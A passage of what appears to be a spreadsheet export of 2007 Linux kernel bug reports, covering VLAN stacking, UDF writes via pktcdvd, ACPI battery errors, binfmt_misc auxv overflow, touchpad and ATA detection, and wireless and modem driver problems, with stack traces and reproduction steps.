read_cis_cache+0x10f/0x180 [pcmcia_core] [&lt;d88d2f0f&gt;] parse_cftable_entry+0x22f/0x380 [pcmcia_core] [&lt;d89a6cf4&gt;] serial_config+0x154/0x210 [serial_cs] [&lt;d8a485e0&gt;] pcmcia_device_probe+0xd0/0x170 [pcmcia] [&lt;c0284f3c&gt;] really_probe+0x9c/0x150 [&lt;c0285042&gt;] driver_probe_device+0x42/0x60 [&lt;c028417a&gt;] bus_for_each_drv+0x3a/0x60 [&lt;c02850bb&gt;] device_attach+0x4b/0x80 [&lt;c0285060&gt;] __device_attach+0x0/0x10 [&lt;c028491d&gt;] bus_rescan_devices_helper+0x1d/0x70 [&lt;c028408a&gt;] bus_for_each_dev+0x3a/0x60 [&lt;c0284983&gt;] bus_rescan_devices+0x13/0x20 [&lt;c0284900&gt;] bus_rescan_devices_helper+0x0/0x70 [&lt;d8a4ba74&gt;] bind_request+0x1f4/0x2e0 [pcmcia] [&lt;d8a4c64a&gt;] ds_ioctl+0x57a/0x690 [pcmcia] [&lt;c0177465&gt;] min_pages_to_free+0x15/0x30 [&lt;d8a4c0d0&gt;] ds_ioctl+0x0/0x690 [pcmcia] [&lt;c0186bac&gt;] do_ioctl+0xac/0xd0 [&lt;c0186d4e&gt;] vfs_ioctl+0x5e/0x1d0 [&lt;c0186f37&gt;] sys_ioctl+0x77/0x90 [&lt;c01040ea&gt;] syscall_call+0x7/0xb ======================= IRQ handler type mismatch for IRQ 10 current handler: ALI 5451 [&lt;c01563d7&gt;] setup_irq+0x1c7/0x210 [&lt;c0156660&gt;] request_irq+0xb0/0x100 [&lt;d8a4b1a0&gt;] test_action+0x0/0x10 [pcmcia] [&lt;d8a4b2c5&gt;] pcmcia_request_irq+0x115/0x210 [pcmcia] [&lt;d89a66d8&gt;] simple_config+0x1b8/0x360 [serial_cs] [&lt;d88d18ef&gt;] read_cis_cache+0x10f/0x180 [pcmcia_core] [&lt;d88d2f0f&gt;] parse_cftable_entry+0x22f/0x380 [pcmcia_core] [&lt;d89a6cf4&gt;] serial_config+0x154/0x210 [serial_cs] [&lt;d8a485e0&gt;] pcmcia_device_probe+0xd0/0x170 [pcmcia] [&lt;c0284f3c&gt;] really_probe+0x9c/0x150 [&lt;c0285042&gt;] driver_probe_device+0x42/0x60 [&lt;c028417a&gt;] bus_for_each_drv+0x3a/0x60 [&lt;c02850bb&gt;] device_attach+0x4b/0x80 [&lt;c0285060&gt;] __device_attach+0x0/0x10 [&lt;c028491d&gt;] bus_rescan_devices_helper+0x1d/0x70 [&lt;c028408a&gt;] bus_for_each_dev+0x3a/0x60 [&lt;c0284983&gt;] bus_rescan_devices+0x13/0x20 [&lt;c0284900&gt;] bus_rescan_devices_helper+0x0/0x70 [&lt;d8a4ba74&gt;] bind_request+0x1f4/0x2e0 [pcmcia] [&lt;d8a4c64a&gt;] ds_ioctl+0x57a/0x690 [pcmcia] [&lt;c0177465&gt;] min_pages_to_free+0x15/0x30 [&lt;d8a4c0d0&gt;] ds_ioctl+0x0/0x690 [pcmcia] [&lt;c0186bac&gt;] do_ioctl+0xac/0xd0 [&lt;c0186d4e&gt;] vfs_ioctl+0x5e/0x1d0 [&lt;c0186f37&gt;] sys_ioctl+0x77/0x90 [&lt;c01040ea&gt;] syscall_call+0x7/0xb ======================= pcmcia: request for exclusive IRQ could not be fulfilled. pcmcia: the driver needs updating to supported shared IRQ lines. 1.0: ttyS1 at I/O 0x3e8 (irq = 11) is a 16550A eth1: New link status: Disconnected (0002) eth1: New link status: Connected (0001)</t>
  </si>
  <si>
    <t>802.1q VLAN stacking + REORDER_HDR is broken</t>
  </si>
  <si>
    <t>2007-07-16 00:02 UTC</t>
  </si>
  <si>
    <t>Tristan Schmelcher</t>
  </si>
  <si>
    <t>2009-03-23 11:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: Several (see below) Hardware Environment: Several (see below) Software Environment: Several (see below) Problem Description: Combining VLAN stacking with the REORDER_HDR flag on either the inner or outer VLAN interface does not work. The computer puts only one VLAN tag on the wire. Steps to reproduce: vconfig add eth0 12 ifconfig eth0.12 up vconfig add eth0.12 2 ifconfig eth0.12.2 192.168.254.100 (default is REORDER_HDR 1, so they both have it set) ping 192.168.254.101 (no response) tcpdump -i eth0: 23:04:53.301156 vlan 2, p 0, arp who-has 192.168.254.101 tell tinygod2.local 23:04:54.301214 vlan 2, p 0, arp who-has 192.168.254.101 tell tinygod2.local 23:04:56.301326 vlan 2, p 0, arp who-has 192.168.254.101 tell tinygod2.local But: vconfig set_flag eth0.12 1 0 vconfig set_flag eth0.12.2 1 0 ping 192.168.254.101 (Responses) tcpdump -i eth0: 23:10:44.932200 vlan 12, p 0, vlan 2, p 0, IP tinygod2.local &gt; tinygod3.local: ICMP echo request, id 61054, seq 1, length 64 23:10:44.932364 vlan 12, p 0, vlan 2, p 0, IP tinygod3.local &gt; tinygod2.local: ICMP echo reply, id 61054, seq 1, length 64 23:10:45.937238 vlan 12, p 0, vlan 2, p 0, IP tinygod2.local &gt; tinygod3.local: ICMP echo request, id 61054, seq 2, length 64 23:10:45.937445 vlan 12, p 0, vlan 2, p 0, IP tinygod3.local &gt; tinygod2.local: ICMP echo reply, id 61054, seq 2, length 64 23:10:46.937196 vlan 12, p 0, vlan 2, p 0, IP tinygod2.local &gt; tinygod3.local: ICMP echo request, id 61054, seq 3, length 64 23:10:46.937401 vlan 12, p 0, vlan 2, p 0, IP tinygod3.local &gt; tinygod2.local: ICMP echo reply, id 61054, seq 3, length 64 If REORDER_HDR is 1 on only one of the two VLAN interfaces, it's still broken. However, if it's 1 on the inner interface and 0 on the outer one, then it's the outer tag that shows up on the wire, instead of the inner tag as in the rest of the cases. Note also that if the NIC card has VLAN acceleration then there's no problem with the above case. However, if you do 3 levels of stacked VLANs and put REORDER_HDR on one of the two inner ones, then it's broken in the analogous way. I have tested this on 3 computers, which between them have the same number of distinct distributions, kernel versions, NIC cards, and architectures. They are: (1) Kubuntu Feisty Fawn 2.6.20-15-generic on a Compaq AMD Athlon64 laptop with a Realtek RTL-8139 (used for the above output) (2) Debian Lenny 2.6.18-4-amd64 on a Dell Intel Core 2 Duo laptop with a Broadcom NetXtreme BCM5752 (which has acceleration) (3) uClinux 2.6.17-uc1 on a Nios II embedded system with the OpenCores MAC. Note that this appears to be the same bug as was long ago discovered by another user and described here: http://www.candelatech.com/pipermail/vlan/2004-December/000190.html</t>
  </si>
  <si>
    <t>BUG at fs/buffer.c when writing to an UDF FS through ptkcdvd</t>
  </si>
  <si>
    <t>2.6.22-rc6-mm1</t>
  </si>
  <si>
    <t>2007-07-16 07:10 UTC</t>
  </si>
  <si>
    <t>2007-07-28 13:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22-rc3-mm1 (I did not test 2.6.22-rc4-mm[12]) Distribution: Ubuntu 7.04 Hardware Environment: AMD Athlon(TM) XP 1600+ desktop, ASUS A7V133-C motherboard HL-DT-ST DVDRAM GSA-4165B DVD burner Software Environment: libata, pata_via, sr_mod, pktcdvd modules Problem Description: Writing a file to an UDF-formatted DVD-RW through pktcdvd driver triggers this BUG : [ 9921.856569] pktcdvd: Fixed packets, 16 blocks, Mode-1 disc [ 9921.863155] pktcdvd: write speed 2770kB/s [ 9927.260207] pktcdvd: 4595774kB available on disc [ 9930.003894] UDF-fs INFO UDF 0.9.8.1 (2004/29/09) Mounting volume 'LinuxUDF', timestamp 2006/10/08 21:17 (1078) [ 9930.028042] mount used greatest stack depth: 384 bytes left [10074.679445] ------------[ cut here ]------------ [10074.679460] kernel BUG at fs/buffer.c:1968! [10074.679465] invalid opcode: 0000 [#1] [10074.679468] PREEMPT [10074.679473] Modules linked in: udf binfmt_misc pktcdvd lp radeon drm nls_iso8859_1 nls_cp850 vfat fat reiser4 eeprom w83781d hwmon_vid firewire_ohci firewire_core crc_itu_t snd_ens1371 gameport snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer sg uhci_hcd sr_mod cdrom rtc snd_seq_device snd floppy pcspkr 8250_pnp 8250 serial_core ohci1394 i2c_viapro via686a ata_generic usbcore soundcore snd_page_alloc ieee1394 parport_pc parport via_agp agpgart evdev reiserfs sd_mod pata_via libata scsi_mod dm_mirror dm_mod [10074.679549] CPU: 0 [10074.679551] EIP: 0060:[&lt;c0178945&gt;] Not tainted VLI [10074.679554] EFLAGS: 00210246 (2.6.22-rc6-mm1 #29) [10074.679569] EIP is at block_write_begin+0x5a/0xdb [10074.679575] eax: c406ce5c ebx: c406cde4 ecx: c4cce550 edx: c406cdd4 [10074.679581] esi: 00000000 edi: 00000000 ebp: c406cd24 esp: c406cd04 [10074.679587] ds: 007b es: 007b fs: 0000 gs: 0033 ss: 0068 [10074.679593] Process dd (pid: 9750, ti=c406c000 task=c62e97d0 task.ti=c406c000) [10074.679597] Stack: 00000044 c406cd3c c4cce480 00000001 00000000 00000000 00000000 00000000 [10074.679609] c406cd4c e1f04348 00000000 00000000 00001000 00000000 c406cdd4 c406cdd0 [10074.679620] e1f06995 00001000 c406cde4 c01400d2 00000000 00000000 00001000 00000000 [10074.679632] Call Trace: [10074.679636] [&lt;c0104dc0&gt;] show_trace_log_lvl+0x1a/0x2f [10074.679647] [&lt;c0104e70&gt;] show_stack_log_lvl+0x9b/0xa3 [10074.679654] [&lt;c010505c&gt;] show_registers+0x1e4/0x328 [10074.679660] [&lt;c010529e&gt;] die+0xfe/0x230 [10074.679666] [&lt;c0105459&gt;] do_trap+0x89/0xa2 [10074.679672] [&lt;c01057c4&gt;] do_invalid_op+0x88/0x92 [10074.679679] [&lt;c02b80a2&gt;] error_code+0x6a/0x70 [10074.679687] [&lt;e1f04348&gt;] udf_write_begin+0x3d/0x43 [udf] [10074.679707] [&lt;c01400d2&gt;] generic_file_buffered_write+0xe8/0x5c3 [10074.679736] [&lt;e1f03d4d&gt;] udf_file_aio_write+0xce/0xeb [udf] [10074.679747] [&lt;c015b440&gt;] do_sync_write+0xc4/0x101 [10074.679754] [&lt;c015bb98&gt;] vfs_write+0x90/0x119 [10074.679760] [&lt;c015c082&gt;] sys_write+0x3d/0x61 [10074.679766] [&lt;c0103eb6&gt;] sysenter_past_esp+0x5f/0x85 [10074.679773] ======================= [10074.679776] Code: c0 89 c3 c7 45 ec f4 ff ff ff 0f 84 91 00 00 00 8b 45 18 89 18 c7 45 f0 01 00 00 00 eb 11 8b 03 c7 45 f0 00 00 00 00 a8 01 75 04 &lt;0f&gt; 0b eb fe 8b 45 20 8b 55 10 89 f1 81 e1 ff 0f 00 00 89 44 24 [10074.679830] EIP: [&lt;c0178945&gt;] block_write_begin+0x5a/0xdb SS:ESP 0068:c406cd04 [10258.652233] SysRq : Show Blocked State [10258.653119] [10258.653121] free sibling [10258.654811] task PC stack pid father child younger older [10258.655737] flexbackup D 0000078E 1536 9735 8548 (NOTLB) [10258.656676] c302dee0 00200086 06d7200e 0000078e d182cd60 06d7200e 0000078e c5468b70 [10258.656888] c257d100 c5468b84 c302defc c4cce4f8 00200246 c302df1c c02b7006 00000000 [10258.657939] c302df10 c016194e df4a41e8 d182cbd0 c4cce50c c4cce50c d182cbd0 c4cce4f8 [10258.659004] Call Trace: [10258.660761] [&lt;c02b7006&gt;] __mutex_lock_slowpath+0x11c/0x219 [10258.661707] [&lt;c02b711f&gt;] mutex_lock+0x1c/0x1f [10258.662633] [&lt;c0162419&gt;] vfs_unlink+0x32/0x81 [10258.663566] [&lt;c0163fc1&gt;] do_unlinkat+0x86/0x116 [10258.664502] [&lt;c0164061&gt;] sys_unlink+0x10/0x12 [10258.665432] [&lt;c0103eb6&gt;] sysenter_past_esp+0x5f/0x85 [10258.666367] ======================= [10258.667271] Sched Debug Version: v0.03, cfs-v18, 2.6.22-rc6-mm1 #29 Steps to reproduce: * put an UDF-formatted DVD-RW in the DVD burner * mount it through pktkcdvd : ~$ mount /media/pkt ~$ mount | grep pkt /dev/pktcdvd/0 on /media/pkt type udf (rw,noexec,nosuid,nodev,noatime) * try to write a file : ~$ dd if=/dev/zero of=/media/pkt/flexbackup/test bs=1k count=8 Erreur de segmentation note: creating a 0k sized file does not trigger the BUG.</t>
  </si>
  <si>
    <t>ACPI battery power indicator jumps from $ACTUAL % to 0% and back</t>
  </si>
  <si>
    <t>2.6.20-15-lowlatency (ubuntu 7.04)</t>
  </si>
  <si>
    <t>2007-07-16 09:14 UTC</t>
  </si>
  <si>
    <t>2007-08-25 21:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None that I know of Distribution: Kubuntu 7.04 Hardware Environment: Zepto ZNote 4200/Compal CL56 Software Environment: Problem Description: The problem was first described on linux-acpi@vger.kernel.org: &gt; My notebook is behaving somewhat oddly. The KDE battery indicator &gt; usually shows the right amount of battery power left, although every now &gt; and then, it jumps to a value in the range 0-10%, and then jumps back. &gt; This is quite annoying, because it gives of all sorts of warnings about &gt; imminent power failure. &gt; &gt; I'm running kubuntu 7.04 with 2.6.20-15-generic from standard packages, &gt; on a Zepto 4200 (rebranded Compal CL56) &gt; &gt; It _seems_ -- I'm not quite sure about the causality of this -- that the &gt; following error messages turn up in dmesg when the jump happens: &gt; &gt; ... &gt; [577843.068000] ACPI Error (psparse-0537): Method parse/execution failed &gt; [\_SB_.PCI0.LPC0.BAT1._BST] (Node df853608), AE_NOT_FOUND &gt; [577843.068000] ACPI Exception (acpi_battery-0207): AE_NOT_FOUND, &gt; Evaluating _BST [20060707] &gt; [577873.068000] ACPI Error (psargs-0355): [PBST] Namespace lookup &gt; failure, AE_NOT_FOUND &gt; [577873.068000] ACPI Error (psparse-0537): Method parse/execution failed &gt; [\_SB_.PCI0.LPC0.BAT1._BST] (Node df853608), AE_NOT_FOUND &gt; [577873.068000] ACPI Exception (acpi_battery-0207): AE_NOT_FOUND, &gt; Evaluating _BST [20060707] &gt; [577903.080000] ACPI Error (psargs-0355): [PBST] Namespace lookup &gt; failure, AE_NOT_FOUND &gt; [577903.080000] ACPI Error (psparse-0537): Method parse/execution failed &gt; [\_SB_.PCI0.LPC0.BAT1._BST] (Node df853608), AE_NOT_FOUND &gt; [577903.080000] ACPI Exception (acpi_battery-0207): AE_NOT_FOUND, &gt; Evaluating _BST [20060707] &gt; [577933.076000] ACPI Error (psargs-0355): [PBST] Namespace lookup &gt; failure, AE_NOT_FOUND &gt; [577933.076000] ACPI Error (psparse-0537): Method parse/execution failed &gt; [\_SB_.PCI0.LPC0.BAT1._BST] (Node df853608), AE_NOT_FOUND &gt; [577933.076000] ACPI Exception (acpi_battery-0207): AE_NOT_FOUND, &gt; Evaluating _BST [20060707] &gt; [577963.068000] ACPI Error (psargs-0355): [PBST] Namespace lookup &gt; failure, AE_NOT_FOUND &gt; [577963.068000] ACPI Error (psparse-0537): Method parse/execution failed &gt; [\_SB_.PCI0.LPC0.BAT1._BST] (Node df853608), AE_NOT_FOUND &gt; [577963.068000] ACPI Exception (acpi_battery-0207): AE_NOT_FOUND, &gt; Evaluating _BST [20060707] &gt; ... &gt; &gt; Maybe it has nothing to do with it? It seems to be battery-related, at &gt; least. &gt; &gt; Is there something else I can do to help debug the cause of these error &gt; messages and/or the battery problem? &gt; &gt; I've attached the output of dmidecode and acpidump, in case it's useful. Steps to reproduce: Simply run the computer without AC-power, and the problem will manifest itself.</t>
  </si>
  <si>
    <t>AT_VECTOR_SIZE not big enough for some platforms with binfmt 'c/o' option</t>
  </si>
  <si>
    <t>2007-07-17 10:21 UTC</t>
  </si>
  <si>
    <t>2008-09-23 05:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Don't believe it ever worked Distribution: Not distro specific Hardware Environment: Power but probably affects others Software Environment: Kernel with binfmt_misc Problem Description: The binfmt_misc 'C' or 'O' options add an extra aux entry (AT_EXECFD) for the file descriptor of the binary intended to be executed. Unfortunately on Power this ends up using 22 entries out of the 22 available thus leaving nowhere for the AT_NULL terminator. The symptom is often a seg in the linker as it walks off the end of the auxv until it hits something null. The simple fix is to add 2 to AT_VECTOR_SIZE in include/linux/auxvec.h (i.e. take it to 46); however: 1) I'm not sure it's a good idea to have AT_VECTOR_SIZE defined independent of architecture since each arch defines its own ARCH_DLINFO and thus its own extra entries. (I think PowerPC has the largest at the moment) 2) I worry that nothing detected the overflow cleanly rather than giving userspace a duff auxv - is that safe? Steps to reproduce: Register a binfmt_misc handler with the 'c' flag, cause it to trigger and watch the handler segfault, or print out your auxv in the handler. Dave</t>
  </si>
  <si>
    <t>Michael Chan</t>
  </si>
  <si>
    <t>Elantech touchpad is incorrectly recogonised as a "ImPS/2 Logitech Wheel Mouse"</t>
  </si>
  <si>
    <t>2007-07-19 07:33 UTC</t>
  </si>
  <si>
    <t>Martin Ahnelöv</t>
  </si>
  <si>
    <t>2010-03-22 17:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Ubuntu Fiesty 7.04 Hardware Environment: http://launchpadlibrarian.net/8321931/lspci-vvn.log http://launchpadlibrarian.net/8321932/lscpi-vv.log Problem Description: Hi! I come from the ubuntu-project. One of our users have reported a bug concerning his synaptic touchpad: "My touchpad is incorrectly recognised as a 'ImPS/2 Logitech Wheel Mouse'" and this "prevents me from configuring touchpad options like disabling the touchpad whilst typing or configuring the shortcut key (fn + F2) to disable the touchpad whilst i have a usb mouse attached." More info: http://launchpadlibrarian.net/8321915/dmesg.log http://launchpadlibrarian.net/8355072/lsusb.log http://launchpadlibrarian.net/8355074/pbud.log The whole bug report on launchpad is here: https://launchpad.net/bugs/123775</t>
  </si>
  <si>
    <t>ata_piix cannot see ICHx IDE devices</t>
  </si>
  <si>
    <t>2007-07-19 13:21 UTC</t>
  </si>
  <si>
    <t>Edward Amsden</t>
  </si>
  <si>
    <t>2007-08-08 06:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.19 (Knoppix) Distribution:ubuntu Hardware Environment: intel ich4 chipset Software Environment: ubuntu gutsy gibbon testing Problem Description: ata_piix does not detect ide drives with intel ICHx chipsets. This problem has been the subject of numerous bug reports and forum posts in the ubuntu community. The most obvious manifestation is when a user succesfully begins to boot the ubuntu desktop cd, only to have it fail as it attempts to mount the file system. another manifestation occurs when a user with an ide or sata hard drive on an ICHx chipset machine attempts to boot after upgrading the kernel from 2.6.17 (in ubuntu 6.10) to 2.6.20 (in ubuntu 7.04) Steps to reproduce: attempt to boot ubuntu with kernel 2.6.20 - 2.6.22 on a machine with an intel ide chipset. Any drives attached to the ide bus will not be recognized. I am writing this on an ubuntu machine which uses the ich4 ide bus to connect to the cd drive, but a scsi bus for the hard drive. This necessitated a netboot installation, and the installed system is still unable to utilize the hard disk. Here is the dmesg|grep ata output (with two irrelevant lines containing the word "data" removed) [ 45.780805] libata version 2.21 loaded. [ 45.782248] ata_piix 0000:00:1f.1: version 2.11 [ 45.782435] scsi0 : ata_piix [ 45.782496] scsi1 : ata_piix [ 45.782527] ata1: PATA max UDMA/100 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x000124a0 irq 14 [ 45.782530] ata2: PATA max UDMA/100 cmd 0x00010170 ctl 0x00010376 bmdma 0x000124a8 irq 15 [ 45.782555] ata1: port disabled. ignoring.</t>
  </si>
  <si>
    <t>Error inserting ipt_LOG (mod_path): Device or resource busy</t>
  </si>
  <si>
    <t>2007-07-21 00:49 UTC</t>
  </si>
  <si>
    <t>2007-07-25 15:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.6 Distribution: Fedora 7 Hardware Environment: irrelevant Software Environment: Fedora 7 + vanilla kernel 2.6.22 Problem Description: After I upgraded to 2.6.22 kernel, my iptables configuration no longer works and I get the above error message. When the error occurs I have these iptables modules loaded: [root@localhost sysconfig]# lsmod | egrep "x._|ipt" | awk '{print $1}' xt_limit xt_tcpudp xt_pkttype ipt_ULOG xt_multiport iptable_filter ip_tables x_tables [root@localhost sysconfig]# modprobe ipt_LOG FATAL: Error inserting ipt_LOG (/lib/modules/2.6.22-k8l/kernel/net/ipv4/netfilter/ipt_LOG.ko): Device or resource busy If I remove all iptables modules then I can successfully modprobe ipt_LOG. Steps to reproduce: boot the PC or # service iptables start</t>
  </si>
  <si>
    <t>System lock up with Broadcom wireless driver if AP is unreachable</t>
  </si>
  <si>
    <t>2007-07-22 07:02 UTC</t>
  </si>
  <si>
    <t>2007-08-13 16:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21 I didn't tried 2.6.21.6 neither 2.6.22.0, but I think this is a plain 2.6.22 regression. Distribution: Bluewhite64 / Slackware 12 64 bits Hardware Environment: Laptop/Athlon64 3000 1GB + Broadcom BCM43xx wireless integrated chipset, accessing a DLink AP Software Environment: wpa_supplicant, TKIP, premptible kernel Problem Description: When I boot my system, it tries to connect to the AP. wpa_supplicant is started, then after a timeout (my AP is unreachable), it tries anyway to start dhcpcd and process further the boot. Sometimes, it can succeeds then stalls after a dozen minutes, sometime the system stalls immediatly at boot (while waiting for DHCP to timeout) and is completly unusable (no keyboard under the console, or under X if it managed to boot), the mouse can still move under X, reset buttun calls init 0 but init is unable to kill some processes at shutdown, so only hard reset can reboot the laptop). I suspected a kernel bug and recompiled with soft lockup and deadlock detection. At reboot, the system write zillions of errors on the console and freezed CPU 100% (I think, the fan was going crazy). So I reboot in single mode (where network is not started), remove wireless configuration and restarted. Then it booted OK. I started wpa_supplicant manually (same commande from the wireless scripts), and I got this: BUG: sleeping function called from invalid context at kernel/rwsem.c:47 in_atomic():1, irqs_disabled():1 INFO: lockdep is turned off. irq event stamp: 0 hardirqs last enabled at (0): [&lt;0000000000000000&gt;] 0x0 hardirqs last disabled at (0): [&lt;ffffffff8022ce8b&gt;] copy_process+0x30b/0x1590 softirqs last enabled at (0): [&lt;ffffffff8022ce8b&gt;] copy_process+0x30b/0x1590 softirqs last disabled at (0): [&lt;0000000000000000&gt;] 0x0 Call Trace: [&lt;ffffffff8022a149&gt;] __might_sleep+0xc9/0xe0 [&lt;ffffffff802476fd&gt;] down_write+0x1d/0x50 [&lt;ffffffff8027fee1&gt;] create_kmalloc_cache+0x41/0xe0 [&lt;ffffffff8027fa91&gt;] get_slab+0x1d1/0x210 [&lt;ffffffff8040b6c4&gt;] bcm43xx_dma_tx+0x2d4/0x4b0 [&lt;ffffffff80281136&gt;] __kmalloc_track_caller+0x26/0xc0 [&lt;ffffffff804fca9f&gt;] __alloc_skb+0x6f/0x160 [&lt;ffffffff8040b6c4&gt;] bcm43xx_dma_tx+0x2d4/0x4b0 [&lt;ffffffff803fa7fb&gt;] bcm43xx_ieee80211_hard_start_xmit+0xab/0xb0 [&lt;ffffffff805998e5&gt;] ieee80211_xmit+0xaf5/0xec0 [&lt;ffffffff802d4560&gt;] ext3_get_block+0x0/0x110 [&lt;ffffffff80501e5e&gt;] dev_hard_start_xmit+0x25e/0x2c0 [&lt;ffffffff80510338&gt;] __qdisc_run+0xc8/0x200 [&lt;ffffffff80504336&gt;] dev_queue_xmit+0x246/0x310 [&lt;ffffffff8057614a&gt;] packet_sendmsg+0x25a/0x2c0 [&lt;ffffffff8026500d&gt;] activate_page+0x4d/0xf0 [&lt;ffffffff804f59bf&gt;] sock_sendmsg+0xdf/0x110 [&lt;ffffffff805a99e6&gt;] _spin_unlock_irq+0x36/0x60 [&lt;ffffffff802443f0&gt;] autoremove_wake_function+0x0/0x40 etc. (full log appended). This occurs only once, I restarted wpa_supplicant and didn't managed to get it after, but it seems to be systematic at boot on my laptop... Btw, I managed to boot once, but then it had found the AP. So I suspect a deadlock in the broadcom driver. This bug was not present in 2.6.21.x previous kernels, it seems a regression, and makes 2.6.22 useless (PC don't boot in init level 2 or more) unless I remove Wifi when AP is not reachable. Steps to reproduce: I guess: get a bcm wifi enabled hardware, and start wpa_supplicant. Full dmesg log appended.</t>
  </si>
  <si>
    <t>pata_hpt37x: BIOS has not set timing clocks.</t>
  </si>
  <si>
    <t>2007-07-22 15:33 UTC</t>
  </si>
  <si>
    <t>2007-08-15 05:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.6 Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:00.1 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:00.2 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:00.3 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:00.4 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:00.7 Host bridge: VIA Technologies, Inc. PT880 Host Bridge 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge 00:0a.0 RAID bus controller: Triones Technologies, Inc. HPT374 (rev 07) 00:0a.1 RAID bus controller: Triones Technologies, Inc. HPT374 (rev 07) 00:0b.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 06) 00:0b.1 Input device controller: Creative Labs SB Live! Game Port (rev 06) 00:0c.0 Ethernet controller: D-Link System Inc DGE-528T Gigabit Ethernet Adapter (rev 10) 00:0d.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80) 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South] 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60) 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 78) 01:00.0 VGA compatible controller: nVidia Corporation NV44A [GeForce 6200] (rev a1) Software Environment: System uname: 2.6.22.1 i686 Intel(R) Celeron(R) CPU 2.66GHz Gentoo Base System release 1.12.9 Timestamp of tree: Fri, 20 Jul 2007 10:50:01 +0000 distcc 2.18.3 i686-pc-linux-gnu (protocols 1 and 2) (default port 3632) [disabled] ccache version 2.4 [enabled] dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: 2.4-r7 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.17 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.23b virtual/os-headers: 2.6.21 ACCEPT_KEYWORDS="x86" AUTOCLEAN="yes" CBUILD="i686-pc-linux-gnu" CFLAGS="-march=pentium4 -O2 -pipe -msse2 -mfpmath=sse -fomit-frame-pointer" CHOST="i686-pc-linux-gnu" Problem Description: I switched from vanilla 2.6.21.6 to 2.6.22.1 and noticed that my drives attached to the Highpoint Rockedraid 454 had disapeared. In dmsg I found the following: hpt37x: DPLL did not stabilize. pata_hpt37x: BIOS has not set timing clocks. hpt37x: DPLL did not stabilize. Steps to reproduce: Use pata_hpt37x (compiled into kernel) with Highpoint Rockedraid 454 (HPT374) Reboot as often as you like. Using the "old" "HPT36X/37X chipset support" works fine. But the behavior is new. In kernel 2.6.21.* the driver "pata_hpt37x" worked more or less so I could run my disks without problems. I found the following which might belong to this issue: "2.6.21-rc6-mm1 ATA HPT37x regression" (http://www.ussg.iu.edu/hypermail/linux/kernel/0704.2/0333.html) For now I am runing fine with "HPT36X" but I would like to see it fixed. For more infos, debug etc etc... let me know. regards Bjoern Olausson</t>
  </si>
  <si>
    <t>kernel incorrectly initialises mass storage component of HUAWEI E220</t>
  </si>
  <si>
    <t>2007-07-22 17:21 UTC</t>
  </si>
  <si>
    <t>Thoralf Dassler</t>
  </si>
  <si>
    <t>2009-03-23 10:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: vanilla 2.6.22 Distribution: Slackware 12.0 Hardware Environment: HUAWEI USB modem E220 on Intel 82801G (ICH7) USB2 EHCI; Intel 82801G (ICH7) PCI Express Software Environment: SCSI Problem Description: The HUAWEI USB modem includes a mass storage device to access the modem's built-in ROM. The kernel's SCSI environment (see relevant dmesg below) incorrectly initializes that mass storage device as a CDROM on /dev/sr1, which causes three known symptoms: 1) "/etc/rc.d/rc.hald start" removes /dev/sr1 until udev puts it back. This means that the modem gets initialized twice every time I boot Linux. Workarounds: (i) do not start hald, or (ii) attach the modem after hald has initialized. 2) k3b device scan also removes /dev/sr1 and if I am unlucky and have pppd already running, pppd gets terminated as well. Workaround: "chmod 000 /dev/sr1" or "chgrp root /dev/sr1" (Slackware udev initializes /dev/sr1 as group cdrom). 3) Warnings from module "option": dmesg | grep -i option option: Unknown symbol usb_serial_port_softint option: Unknown symbol usb_serial_disconnect option: Unknown symbol usb_serial_probe option: Unknown symbol usb_serial_register option: Unknown symbol usb_serial_deregister option 3-1:1.0: GSM modem (1-port) converter detected option 3-1:1.1: GSM modem (1-port) converter detected usbcore: registered new interface driver option drivers/usb/serial/option.c: USB Driver for GSM modems: v0.7.1 Other relevant information: dmesg | grep 